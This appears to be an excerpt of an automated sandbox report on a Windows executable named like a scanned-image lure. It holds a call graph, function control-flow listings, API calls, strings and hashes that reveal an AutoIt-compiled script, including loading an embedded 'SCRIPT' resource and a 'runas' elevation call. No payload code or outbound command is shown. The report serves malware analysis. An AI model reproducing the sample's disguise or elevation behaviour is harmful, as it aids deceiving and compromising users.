492da7 96851->96859 96860 492dc6 SetFocus 96851->96860 96852->96871 96856->96834 96882 4b0ad7 22 API calls 96856->96882 96863 453253 96857->96863 96869 4531c4 96857->96869 96858 492e8e 96858->96834 96858->96871 96864 492db0 96859->96864 96859->96869 96860->96871 96861 453214 96876 453c50 DeleteObject DestroyWindow 96861->96876 96862 453263 96862->96871 96877 45326f 44 API calls ___scrt_fastfail 96863->96877 96878 4518e2 10 API calls 96864->96878 96869->96834 96881 4530f2 Shell_NotifyIconW ___scrt_fastfail 96869->96881 96872 492e41 96873 453837 49 API calls 96872->96873 96873->96874 96874->96834 96875->96861 96876->96871 96877->96862 96878->96871 96879->96846 96880->96869 96881->96872 96882->96874 96883->96862 96884->96858 96885 451033 96890 454c91 96885->96890 96889 451042 96891 45a961 22 API calls 96890->96891 96892 454cff 96891->96892 96898 453af0 96892->96898 96895 454d9c 96896 451038 96895->96896 96901 4551f7 22 API calls __fread_nolock 96895->96901 96897 4700a3 29 API calls __onexit 96896->96897 96897->96889 96902 453b1c 96898->96902 96901->96895 96903 453b0f 96902->96903 96904 453b29 96902->96904 96903->96895 96904->96903 96905 453b30 RegOpenKeyExW 96904->96905 96905->96903 96906 453b4a RegQueryValueExW 96905->96906 96907 453b80 RegCloseKey 96906->96907 96908 453b6b 96906->96908 96907->96903 96908->96907 96909 45f7bf 96910 45fcb6 96909->96910 96911 45f7d3 96909->96911 96946 45aceb 23 API calls ISource 96910->96946 96913 45fcc2 96911->96913 96915 46fddb 22 API calls 96911->96915 96947 45aceb 23 API calls ISource 96913->96947 96916 45f7e5 96915->96916 96916->96913 96917 45f83e 96916->96917 96918 45fd3d 96916->96918 96920 461310 207 API calls 96917->96920 96933 45ed9d ISource 96917->96933 96948 4c1155 22 API calls 96918->96948 96941 45ec76 ISource 96920->96941 96921 4a4beb 96952 4c359c 82 API calls __wsopen_s 96921->96952 96923 46fddb 22 API calls 96923->96941 96924 45fef7 96930 45a8c7 22 API calls 96924->96930 96924->96933 96926 4a4b0b 96950 4c359c 82 API calls __wsopen_s 96926->96950 96927 45a8c7 22 API calls 96927->96941 96928 4a4600 96928->96933 96934 45a8c7 22 API calls 96928->96934 96930->96933 96934->96933 96935 45fbe3 96935->96933 96937 4a4bdc 96935->96937 96943 45f3ae ISource 96935->96943 96936 45a961 22 API calls 96936->96941 96951 4c359c 82 API calls __wsopen_s 96937->96951 96938 470242 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection WaitForSingleObjectEx EnterCriticalSection 96938->96941 96940 4700a3 29 API calls pre_c_initialization 96940->96941 96941->96921 96941->96923 96941->96924 96941->96926 96941->96927 96941->96928 96941->96933 96941->96935 96941->96936 96941->96938 96941->96940 96942 4701f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent __Init_thread_footer 96941->96942 96941->96943 96944 4601e0 207 API calls 2 library calls 96941->96944 96945 4606a0 41 API calls ISource 96941->96945 96942->96941 96943->96933 96949 4c359c 82 API calls __wsopen_s 96943->96949 96944->96941 96945->96941 96946->96913 96947->96918 96948->96933 96949->96933 96950->96933 96951->96921 96952->96933 96953 4703fb 96954 470407 __FrameHandler3::FrameUnwindToState 96953->96954 96982 46feb1 96954->96982 96956 47040e 96957 470561 96956->96957 96960 470438 96956->96960 97009 47083f IsProcessorFeaturePresent IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter ___scrt_fastfail 96957->97009 96959 470568 97010 474e52 28 API calls _abort 96959->97010 96970 470477 ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock 96960->96970 96993 48247d 96960->96993 96962 47056e 97011 474e04 28 API calls _abort 96962->97011 96966 470576 96967 470457 96969 4704d8 97001 470959 96969->97001 96970->96969 97005 474e1a 38 API calls 2 library calls 96970->97005 96973 4704de 96974 4704f3 96973->96974 97006 470992 GetModuleHandleW 96974->97006 96976 4704fa 96976->96959 96977 4704fe 96976->96977 96978 470507 96977->96978 97007 474df5 28 API calls _abort 96977->97007 97008 470040 13 API calls 2 library calls 96978->97008 96981 47050f 96981->96967 96983 46feba 96982->96983 97012 470698 IsProcessorFeaturePresent 96983->97012 96985 46fec6 97013 472c94 10 API calls 3 library calls 96985->97013 96987 46fecb 96988 46fecf 96987->96988 97014 482317 96987->97014 96988->96956 96991 46fee6 96991->96956 96995 482494 96993->96995 96994 470a8c __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 96996 470451 96994->96996 96995->96994 96996->96967 96997 482421 96996->96997 96998 482450 96997->96998 96999 470a8c __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 96998->96999 97000 482479 96999->97000 97000->96970 97065 472340 97001->97065 97003 47096c GetStartupInfoW 97004 47097f 97003->97004 97004->96973 97005->96969 97006->96976 97007->96978 97008->96981 97009->96959 97010->96962 97011->96966 97012->96985 97013->96987 97018 48d1f6 97014->97018 97017 472cbd 8 API calls 3 library calls 97017->96988 97021 48d213 97018->97021 97022 48d20f 97018->97022 97020 46fed8 97020->96991 97020->97017 97021->97022 97024 484bfb 97021->97024 97036 470a8c 97022->97036 97025 484c07 __FrameHandler3::FrameUnwindToState 97024->97025 97043 482f5e EnterCriticalSection 97025->97043 97027 484c0e 97044 4850af 97027->97044 97029 484c1d 97035 484c2c 97029->97035 97057 484a8f 29 API calls 97029->97057 97032 484c27 97058 484b45 GetStdHandle GetFileType 97032->97058 97033 484c3d __wsopen_s 97033->97021 97059 484c48 LeaveCriticalSection _abort 97035->97059 97037 470a97 IsProcessorFeaturePresent 97036->97037 97038 470a95 97036->97038 97040 470c5d 97037->97040 97038->97020 97064 470c21 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 97040->97064 97042 470d40 97042->97020 97043->97027 97045 4850bb __FrameHandler3::FrameUnwindToState 97044->97045 97046 4850c8 97045->97046 97047 4850df 97045->97047 97061 47f2d9 20 API calls _abort 97046->97061 97060 482f5e EnterCriticalSection 97047->97060 97050 4850cd 97062 4827ec 26 API calls __wsopen_s 97050->97062 97052 4850d7 __wsopen_s 97052->97029 97053 485117 97063 48513e LeaveCriticalSection _abort 97053->97063 97054 4850eb 97054->97053 97056 485000 __wsopen_s 21 API calls 97054->97056 97056->97054 97057->97032 97058->97035 97059->97033 97060->97054 97061->97050 97062->97052 97063->97052 97064->97042 97066 472357 97065->97066 97066->97003 97066->97066 97067 451098 97072 4542de 97067->97072 97071 4510a7 97073 45a961 22 API calls 97072->97073 97074 4542f5 GetVersionExW 97073->97074 97075 456b57 22 API calls 97074->97075 97076 454342 97075->97076 97077 4593b2 22 API calls 97076->97077 97080 454378 97076->97080 97078 45436c 97077->97078 97079 4537a0 22 API calls 97078->97079 97079->97080 97081 45441b GetCurrentProcess IsWow64Process 97080->97081 97088 4937df 97080->97088 97082 454437 97081->97082 97083 45444f LoadLibraryA 97082->97083 97084 493824 GetSystemInfo 97082->97084 97085 454460 GetProcAddress 97083->97085 97086 45449c GetSystemInfo 97083->97086 97085->97086 97089 454470 GetNativeSystemInfo 97085->97089 97087 454476 97086->97087 97090 45109d 97087->97090 97091 45447a FreeLibrary 97087->97091 97089->97087 97092 4700a3 29 API calls __onexit 97090->97092 97091->97090 97092->97071 97093 45105b 97098 45344d 97093->97098 97095 45106a 97129 4700a3 29 API calls __onexit 97095->97129 97097 451074 97099 45345d __wsopen_s 97098->97099 97100 45a961 22 API calls 97099->97100 97101 453513 97100->97101 97102 453a5a 24 API calls 97101->97102 97103 45351c 97102->97103 97130 453357 97103->97130 97106 4533c6 22 API calls 97107 453535 97106->97107 97108 45515f 22 API calls 97107->97108 97109 453544 97108->97109 97110 45a961 22 API calls 97109->97110 97111 45354d 97110->97111 97112 45a6c3 22 API calls 97111->97112 97113 453556 RegOpenKeyExW 97112->97113 97114 493176 RegQueryValueExW 97113->97114 97118 453578 97113->97118 97115 49320c RegCloseKey 97114->97115 97116 493193 97114->97116 97115->97118 97128 49321e _wcslen 97115->97128 97117 46fe0b 22 API calls 97116->97117 97119 4931ac 97117->97119 97118->97095 97120 455722 22 API calls 97119->97120 97121 4931b7 RegQueryValueExW 97120->97121 97122 4931d4 97121->97122 97125 4931ee ISource 97121->97125 97123 456b57 22 API calls 97122->97123 97123->97125 97124 454c6d 22 API calls 97124->97128 97125->97115 97126 459cb3 22 API calls 97126->97128 97127 45515f 22 API calls 97127->97128 97128->97118 97128->97124 97128->97126 97128->97127 97129->97097 97131 491f50 __wsopen_s 97130->97131 97132 453364 GetFullPathNameW 97131->97132 97133 453386 97132->97133 97134 456b57 22 API calls 97133->97134 97135 4533a4 97134->97135 97135->97106

                                                                                Executed Functions

                                                                                Function 004542DE Relevance: 21.2, APIs: 9, Strings: 3, Instructions: 235libraryloaderCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 234 4542de-45434d call 45a961 GetVersionExW call 456b57 239 454353 234->239 240 493617-49362a 234->240 242 454355-454357 239->242 241 49362b-49362f 240->241 243 493631 241->243 244 493632-49363e 241->244 245 45435d-4543bc call 4593b2 call 4537a0 242->245 246 493656 242->246 243->244 244->241 247 493640-493642 244->247 262 4937df-4937e6 245->262 263 4543c2-4543c4 245->263 251 49365d-493660 246->251 247->242 250 493648-49364f 247->250 250->240 253 493651 250->253 254 45441b-454435 GetCurrentProcess IsWow64Process 251->254 255 493666-4936a8 251->255 253->246 258 454494-45449a 254->258 259 454437 254->259 255->254 256 4936ae-4936b1 255->256 260 4936db-4936e5 256->260 261 4936b3-4936bd 256->261 264 45443d-454449 258->264 259->264 268 4936f8-493702 260->268 269 4936e7-4936f3 260->269 265 4936ca-4936d6 261->265 266 4936bf-4936c5 261->266 270 4937e8 262->270 271 493806-493809 262->271 263->251 267 4543ca-4543dd 263->267 272 45444f-45445e LoadLibraryA 264->272 273 493824-493828 GetSystemInfo 264->273 265->254 266->254 274 4543e3-4543e5 267->274 275 493726-49372f 267->275 277 493715-493721 268->277 278 493704-493710 268->278 269->254 276 4937ee 270->276 279 49380b-49381a 271->279 280 4937f4-4937fc 271->280 281 454460-45446e GetProcAddress 272->281 282 45449c-4544a6 GetSystemInfo 272->282 284 49374d-493762 274->284 285 4543eb-4543ee 274->285 286 49373c-493748 275->286 287 493731-493737 275->287 276->280 277->254 278->254 279->276 288 49381c-493822 279->288 280->271 281->282 289 454470-454474 GetNativeSystemInfo 281->289 283 454476-454478 282->283 290 454481-454493 283->290 291 45447a-45447b FreeLibrary 283->291 294 49376f-49377b 284->294 295 493764-49376a 284->295 292 4543f4-45440f 285->292 293 493791-493794 285->293 286->254 287->254 288->280 289->283 291->290 297 454415 292->297 298 493780-49378c 292->298 293->254 296 49379a-4937c1 293->296 294->254 295->254 299 4937ce-4937da 296->299 300 4937c3-4937c9 296->300 297->254 298->254 299->254 300->254
                                                                                APIs
                                                                                • GetVersionExW.KERNEL32(?), ref: 0045430D
                                                                                  • Part of subcall function 00456B57: _wcslen.LIBCMT ref: 00456B6A
                                                                                • GetCurrentProcess.KERNEL32(?,004ECB64,00000000,?,?), ref: 00454422
                                                                                • IsWow64Process.KERNEL32(00000000,?,?), ref: 00454429
                                                                                • LoadLibraryA.KERNEL32(kernel32.dll,?,?), ref: 00454454
                                                                                • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00454466
                                                                                • GetNativeSystemInfo.KERNELBASE(?,?,?), ref: 00454474
                                                                                • FreeLibrary.KERNEL32(00000000,?,?), ref: 0045447B
                                                                                • GetSystemInfo.KERNEL32(?,?,?), ref: 004544A0
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1703040739.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                                • Associated: 00000000.00000002.1702982965.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.0000000000512000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703313457.000000000051C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703414600.0000000000524000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_450000_Scanned-IMGS_from NomanGroup IDT.jbxd
                                                                                Similarity
                                                                                • API ID: InfoLibraryProcessSystem$AddressCurrentFreeLoadNativeProcVersionWow64_wcslen
                                                                                • String ID: GetNativeSystemInfo$kernel32.dll$|O
                                                                                • API String ID: 3290436268-3101561225
                                                                                • Opcode ID: 959a05911e8203511571b9cdb0bac9a692c6a4848dcc758ae86540ac2a936365
                                                                                • Instruction ID: babe8a42e6f413c8375601808576abb9e8e0803e2490286b0998542110977039
                                                                                • Opcode Fuzzy Hash: 959a05911e8203511571b9cdb0bac9a692c6a4848dcc758ae86540ac2a936365
                                                                                • Instruction Fuzzy Hash: 05A1F862909AD0CFCB31CB697C841977FE66F77345B145CAAD44097722D228094FEB2E
                                                                                Function 004542A2 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 61COMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 1270 4542a2-4542ba CreateStreamOnHGlobal 1271 4542bc-4542d3 FindResourceExW 1270->1271 1272 4542da-4542dd 1270->1272 1273 4935ba-4935c9 LoadResource 1271->1273 1274 4542d9 1271->1274 1273->1274 1275 4935cf-4935dd SizeofResource 1273->1275 1274->1272 1275->1274 1276 4935e3-4935ee LockResource 1275->1276 1276->1274 1277 4935f4-4935fc 1276->1277 1278 493600-493612 1277->1278 1278->1274
                                                                                APIs
                                                                                • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?,?,?,?,?,004550AA,?,?,00000000,00000000), ref: 004542B2
                                                                                • FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,004550AA,?,?,00000000,00000000), ref: 004542C9
                                                                                • LoadResource.KERNEL32(?,00000000,?,?,004550AA,?,?,00000000,00000000,?,?,?,?,?,?,00454F20), ref: 004935BE
                                                                                • SizeofResource.KERNEL32(?,00000000,?,?,004550AA,?,?,00000000,00000000,?,?,?,?,?,?,00454F20), ref: 004935D3
                                                                                • LockResource.KERNEL32(004550AA,?,?,004550AA,?,?,00000000,00000000,?,?,?,?,?,?,00454F20,?), ref: 004935E6
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1703040739.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                                • Associated: 00000000.00000002.1702982965.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.0000000000512000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703313457.000000000051C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703414600.0000000000524000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_450000_Scanned-IMGS_from NomanGroup IDT.jbxd
                                                                                Similarity
                                                                                • API ID: Resource$CreateFindGlobalLoadLockSizeofStream
                                                                                • String ID: SCRIPT
                                                                                • API String ID: 3051347437-3967369404
                                                                                • Opcode ID: 70d6f82660b5fa3f85cf1038757dc770429d5e110491014777d943d30d36a19a
                                                                                • Instruction ID: 75ed67754c6c604d31e45b43c9c53b8b12214b266b346f5da3e90256e1edca32
                                                                                • Opcode Fuzzy Hash: 70d6f82660b5fa3f85cf1038757dc770429d5e110491014777d943d30d36a19a
                                                                                • Instruction Fuzzy Hash: 0511CE70600301BFDB218B65DC88F277BB9EFC5B96F2041AAF903CA291DB71DC068665
                                                                                Function 00492BA5 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 62COMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                APIs
                                                                                • SetCurrentDirectoryW.KERNEL32(?), ref: 00452B6B
                                                                                  • Part of subcall function 00453A5A: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,00521418,?,00452E7F,?,?,?,00000000), ref: 00453A78
                                                                                  • Part of subcall function 00459CB3: _wcslen.LIBCMT ref: 00459CBD
                                                                                • GetForegroundWindow.USER32(runas,?,?,?,?,?,00512224), ref: 00492C10
                                                                                • ShellExecuteW.SHELL32(00000000,?,?,00512224), ref: 00492C17
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1703040739.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                                • Associated: 00000000.00000002.1702982965.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.0000000000512000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703313457.000000000051C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703414600.0000000000524000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_450000_Scanned-IMGS_from NomanGroup IDT.jbxd
                                                                                Similarity
                                                                                • API ID: CurrentDirectoryExecuteFileForegroundModuleNameShellWindow_wcslen
                                                                                • String ID: runas
                                                                                • API String ID: 448630720-4000483414
                                                                                • Opcode ID: df210a6ac257138d55902ac4375985d82374d2501d7b738dc0e6180d0021b0f1
                                                                                • Instruction ID: f64566410f8ea76675a4be1f4b43f367cc6257d259289fc73f5fb63cd177a1bb
                                                                                • Opcode Fuzzy Hash: df210a6ac257138d55902ac4375985d82374d2501d7b738dc0e6180d0021b0f1
                                                                                • Instruction Fuzzy Hash: 1C11EB31104345AACB14FF21D9919AE7BA5AFA2747F44042FFC46020A3DF78994EC75A
                                                                                Function 0045D730 Relevance: 21.6, APIs: 14, Instructions: 627windowsleeptimeCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetInputState.USER32 ref: 0045D807
                                                                                • timeGetTime.WINMM ref: 0045DA07
                                                                                • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0045DB28
                                                                                • TranslateMessage.USER32(?), ref: 0045DB7B
                                                                                • DispatchMessageW.USER32(?), ref: 0045DB89
                                                                                • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0045DB9F
                                                                                • Sleep.KERNEL32(0000000A), ref: 0045DBB1
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1703040739.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                                • Associated: 00000000.00000002.1702982965.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.0000000000512000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703313457.000000000051C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703414600.0000000000524000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_450000_Scanned-IMGS_from NomanGroup IDT.jbxd
                                                                                Similarity
                                                                                • API ID: Message$Peek$DispatchInputSleepStateTimeTranslatetime
                                                                                • String ID:
                                                                                • API String ID: 2189390790-0
                                                                                • Opcode ID: fdfcb41e7058bca633c8f0106a44ab5a5e5c4311088f8785d6789b08d9629c3f
                                                                                • Instruction ID: 5980e07657dc114a6b6143f1586959ae71397f788b64b2575bacb261495b16e1
                                                                                • Opcode Fuzzy Hash: fdfcb41e7058bca633c8f0106a44ab5a5e5c4311088f8785d6789b08d9629c3f
                                                                                • Instruction Fuzzy Hash: 6342F370A04241DFD734CF25C884BABB7A1BF56305F14451FE856873A2D7B8E849DB8A
                                                                                Function 00452CD4 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 53windowregistryCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                APIs
                                                                                • GetSysColorBrush.USER32(0000000F), ref: 00452D07
                                                                                • RegisterClassExW.USER32(00000030), ref: 00452D31
                                                                                • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00452D42
                                                                                • InitCommonControlsEx.COMCTL32(?), ref: 00452D5F
                                                                                • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00452D6F
                                                                                • LoadIconW.USER32(000000A9), ref: 00452D85
                                                                                • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00452D94
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1703040739.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                                • Associated: 00000000.00000002.1702982965.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.0000000000512000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703313457.000000000051C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703414600.0000000000524000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_450000_Scanned-IMGS_from NomanGroup IDT.jbxd
                                                                                Similarity
                                                                                • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                                                • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                                                • API String ID: 2914291525-1005189915
                                                                                • Opcode ID: 463af00f0d8c18ee1c456aa3683d0cbcc8a1d9b1ff42be713a645beb3481d670
                                                                                • Instruction ID: 08a2d57615731d76dc1c9b0d1d903e2b97c2b75c2ff148221c1dc60556150d29
                                                                                • Opcode Fuzzy Hash: 463af00f0d8c18ee1c456aa3683d0cbcc8a1d9b1ff42be713a645beb3481d670
                                                                                • Instruction Fuzzy Hash: 5E21F7B1901349AFDB10DFA4EC89BDEBBB4FB19701F00812AF511AA2A0D7B50546DF99
                                                                                Function 0049065B Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 272COMMONLIBRARYCODE
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 302 49065b-49068b call 49042f 305 49068d-490698 call 47f2c6 302->305 306 4906a6-4906b2 call 485221 302->306 311 49069a-4906a1 call 47f2d9 305->311 312 4906cb-490714 call 49039a 306->312 313 4906b4-4906c9 call 47f2c6 call 47f2d9 306->313 320 49097d-490983 311->320 322 490781-49078a GetFileType 312->322 323 490716-49071f 312->323 313->311 324 49078c-4907bd GetLastError call 47f2a3 CloseHandle 322->324 325 4907d3-4907d6 322->325 327 490721-490725 323->327 328 490756-49077c GetLastError call 47f2a3 323->328 324->311 341 4907c3-4907ce call 47f2d9 324->341 332 4907d8-4907dd 325->332 333 4907df-4907e5 325->333 327->328 329 490727-490754 call 49039a 327->329 328->311 329->322 329->328 334 4907e9-490837 call 48516a 332->334 333->334 335 4907e7 333->335 344 490839-490845 call 4905ab 334->344 345 490847-49086b call 49014d 334->345 335->334 341->311 344->345 351 49086f-490879 call 4886ae 344->351 352 49086d 345->352 353 49087e-4908c1 345->353 351->320 352->351 355 4908c3-4908c7 353->355 356 4908e2-4908f0 353->356 355->356 357 4908c9-4908dd 355->357 358 49097b 356->358 359 4908f6-4908fa 356->359 357->356 358->320 359->358 361 4908fc-49092f CloseHandle call 49039a 359->361 364 490931-49095d GetLastError call 47f2a3 call 485333 361->364 365 490963-490977 361->365 364->365 365->358
                                                                                APIs
                                                                                  • Part of subcall function 0049039A: CreateFileW.KERNELBASE(00000000,00000000,?,00490704,?,?,00000000,?,00490704,00000000,0000000C), ref: 004903B7
                                                                                • GetLastError.KERNEL32 ref: 0049076F
                                                                                • __dosmaperr.LIBCMT ref: 00490776
                                                                                • GetFileType.KERNELBASE(00000000), ref: 00490782
                                                                                • GetLastError.KERNEL32 ref: 0049078C
                                                                                • __dosmaperr.LIBCMT ref: 00490795
                                                                                • CloseHandle.KERNEL32(00000000), ref: 004907B5
                                                                                • CloseHandle.KERNEL32(?), ref: 004908FF
                                                                                • GetLastError.KERNEL32 ref: 00490931
                                                                                • __dosmaperr.LIBCMT ref: 00490938
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1703040739.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                                • Associated: 00000000.00000002.1702982965.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.0000000000512000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703313457.000000000051C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703414600.0000000000524000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_450000_Scanned-IMGS_from NomanGroup IDT.jbxd
                                                                                Similarity
                                                                                • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                                                                                • String ID: H
                                                                                • API String ID: 4237864984-2852464175
                                                                                • Opcode ID: af282b47550ed7f352f6e64701acbcb583d790c52155a3869c27289e2231030d
                                                                                • Instruction ID: dfa2e89df4b69bac3fa26ed0e1969bd96c321a3133d136d2bc8529c79230d3b8
                                                                                • Opcode Fuzzy Hash: af282b47550ed7f352f6e64701acbcb583d790c52155a3869c27289e2231030d
                                                                                • Instruction Fuzzy Hash: ABA12732A001048FDF29EF68D8917AE7FA0AB46324F14416EF8159B3D2D7399C17DB99
                                                                                Function 0045344D Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 201registryCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                APIs
                                                                                  • Part of subcall function 00453A5A: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,00521418,?,00452E7F,?,?,?,00000000), ref: 00453A78
                                                                                  • Part of subcall function 00453357: GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 00453379
                                                                                • RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 0045356A
                                                                                • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 0049318D
                                                                                • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 004931CE
                                                                                • RegCloseKey.ADVAPI32(?), ref: 00493210
                                                                                • _wcslen.LIBCMT ref: 00493277
                                                                                • _wcslen.LIBCMT ref: 00493286
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1703040739.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                                • Associated: 00000000.00000002.1702982965.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.0000000000512000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703313457.000000000051C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703414600.0000000000524000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_450000_Scanned-IMGS_from NomanGroup IDT.jbxd
                                                                                Similarity
                                                                                • API ID: NameQueryValue_wcslen$CloseFileFullModuleOpenPath
                                                                                • String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\
                                                                                • API String ID: 98802146-2727554177
                                                                                • Opcode ID: 162ee6dcb699acba039095866e9c5104eeccf69605ed7a435e583f8f3c012a3e
                                                                                • Instruction ID: 9e985ed61b641c7ead6cb54fa2a3443744b40e0c07aac146d53caef695313082
                                                                                • Opcode Fuzzy Hash: 162ee6dcb699acba039095866e9c5104eeccf69605ed7a435e583f8f3c012a3e
                                                                                • Instruction Fuzzy Hash: 7D71A271404300AEC714DF66EC8196BBBE8FFA6345F50082FF94587161EB389A4DCB5A
                                                                                Function 00452B83 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 63windowregistryCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                APIs
                                                                                • GetSysColorBrush.USER32(0000000F), ref: 00452B8E
                                                                                • LoadCursorW.USER32(00000000,00007F00), ref: 00452B9D
                                                                                • LoadIconW.USER32(00000063), ref: 00452BB3
                                                                                • LoadIconW.USER32(000000A4), ref: 00452BC5
                                                                                • LoadIconW.USER32(000000A2), ref: 00452BD7
                                                                                • LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00452BEF
                                                                                • RegisterClassExW.USER32(?), ref: 00452C40
